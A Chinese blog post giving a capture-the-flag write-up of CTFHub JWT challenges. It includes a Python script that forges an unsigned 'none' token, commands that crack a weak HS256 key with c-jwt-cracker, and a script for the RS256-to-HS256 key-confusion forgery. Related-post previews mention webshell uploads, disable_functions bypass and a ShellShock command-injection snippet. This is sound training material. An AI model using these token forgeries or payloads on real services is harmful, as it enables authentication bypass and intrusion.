ctfhub-jwt

发表于2022-09-17|更新于2022-09-17|web

|浏览量:

基础知识

题目附件：jwt 基础知识

flag 在下面

需要了解一下 jwt 组成部分

敏感信息泄露

随便输个

进去查消息头

然后在

decode 一共两部分 ag 是另一半
请添加图片描述

无签名

import jwt
algorithm="none"
payload = {
  "username": "admin",
  "password": "admin",
  "role":"admin"
  }
key = ""
encoded = jwt.encode(payload,key,algorithm)
print(encoded)

jwt 的签名可以为无

今天写这个脚本的时候命名为 jwt.py
结果报错但是系统环境运行正常
才知道是文件名的事
import jwt 他先自己引用自己了

抓包

把 cookie 里的 token 改为这脚本的运行结果

弱密钥

需要用到jwt-cracker

依次执行即可

git clone https://github.com/brendan-rius/c-jwt-cracker
./c-jwt-cracker
make
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IjEiLCJwYXNzd29yZCI6IjEiLCJyb2xlIjoiZ3Vlc3QifQ.w4i8KWRWmY_xTYtRnFZnp5vLIxPG2abCly6lW6QxTKs

然后得出该 jwt 密钥

然后放之前那个网站

改 role 为 admin

请添加图片描述

请添加图片描述返回提交 token

修改签名算法

把 cookie 清空后提交用户名密码

得到一串 jwt

丢进
请添加图片描述
发现是 RS256 编码（不对称式编码)

需要改为对称式编码

如 HS256

题目中给了 public key

用 PUBLIC_KEY 采用 HS256 进行加密 payload 构造 token

借用大神 h0ld1rs的脚本

无签名那段脚本
是勉勉强强写出来的
这题就先用大神的脚本吧
我太菜了

## coding=GBK
import hmac
import hashlib
import base64

file = open('publickey.pem')#需要将文中的publickey下载	与脚本同目录
key = file.read()

## Paste your header and payload here
header = '{"typ": "JWT", "alg": "HS256"}'
payload = '{"username": "admin", "role": "admin"}'

## Creating encoded header
encodeHBytes = base64.urlsafe_b64encode(header.encode("utf-8"))
encodeHeader = str(encodeHBytes, "utf-8").rstrip("=")

## Creating encoded payload
encodePBytes = base64.urlsafe_b64encode(payload.encode("utf-8"))
encodePayload = str(encodePBytes, "utf-8").rstrip("=")

## Concatenating header and payload
token = (encodeHeader + "." + encodePayload)

## Creating signature
sig = base64.urlsafe_b64encode(hmac.new(bytes(key, "UTF-8"), token.encode("utf-8"), hashlib.sha256).digest()).decode("UTF-8").rstrip("=")

print(token + "." + sig)

运行后把 token 返回去验证

成功

请添加图片描述

ctfhub-jwt

https://s1rius.space/2022/09/jwt/

作者

s1rius

发布于

2022-09-17

更新于

2022-09-17

许可协议

CC BY-NC-SA 4.0

web jwt json web token

赞助

wechat
alipay

相关推荐

web我太喜欢 bilibili 大学啦–中北大学打开就一个 phpinfo直接搜 flag 直出虽然我是中北大学的，但这不是我们实验室出的题略感离谱签到-吉林警察学院打开有行注释以为拿来当用户名密码登录就完了来结果只有个登录成功假签到题尝试使用其他用户名（规律：用户名=密码）发现学号改一下会出现字符再试试还有开始爆破burp 先设置最后一位为变量从 1 爆到 9然后再设置两位为变量从 10 开始往后爆最后手打的 flag懒得写脚本了（为了个签到题写脚本不太划算） easy_upload-云南警官学院传个一句话 mua 写的图片 🐎进去发现不行试了半天把 ContentType 改成 png传进去了然后 🐜🗡 连一下找 flag在/home/ctf/flag 302 与深大-深圳大学进去提示 302 重定向burp 抓包然后让 get 和 post 传参进去最后改cookie: admin=trueflag get√ 我太喜欢 bilibili 大学啦修复版-中北大学打开又是 phpinfo看题目描述找 hint于是搜索...

工具彩蛋一开始的想法是工具一共有 8 页，想抓个包改下看看有没有第九页抓包后发现不管哪一页 limit 都是 12 但 offset 在变化于是这样设置参数在长度为 1000 到 6、7 千左右随便一个双击后点击响应看响应包在最后一行首页彩蛋api中间框内隐藏着两行字ctfhub{c18732f48a96c40d40a06e74b1305706} 题目入口彩蛋在 web-ssrf 中间那一列的某些题传参错误时会出现详情见ctfhub-ssrfpost 最后一行介绍公众号公众号彩蛋坑的一批！首先要先绑定然后点彩蛋它提示要回复正确的关键词我*#@%我回复过彩蛋关键词 egg ctfhub CTFHub 拿来把你 CTFer 自己人 …… 到底没想到竟然是 flag 投稿提交彩蛋只找到了前半部分分别在题目提交和 wp 提交页面的最后 1234ctfhub{029e02eb3a1 e8c49b1132b5 15b652a5f3a8 62013} 最后这个彩蛋剩余部分也没找到网上搜了下才明白：感谢 anweilx...

Bypass disable_function

LD_PRELOAD时间紧于是先采用最省时的方法先蚁剑连发现打不开 flag 文件要使用蚁剑插件绕过disabled function 如果蚁剑插件市场打不开的话可以去 github 搜github 上有说明按着他的安连上之后在蚁剑主页面右键 webshell 使用该插件按照步骤操作成功后把 webshell 地址改为 http://……/.antproxy.php在连上就能 tac 了tac /flag ShellShock进去发现连不上查了下大佬博客说是环境不正常原理如下如果环境变量的值以字符() {开头，那么这个变量就会被当作是一个导入函数的定义（Export），这种定义只有在 shell 启动的时候才生效。脚本 123456<?php$cmd = " tac /flag>/var/www/html/1.txt";putenv("PHP_DMIND=() { :; };$cmd");error_log("dmind",1);echo...

评论

数据加载中

数据加载中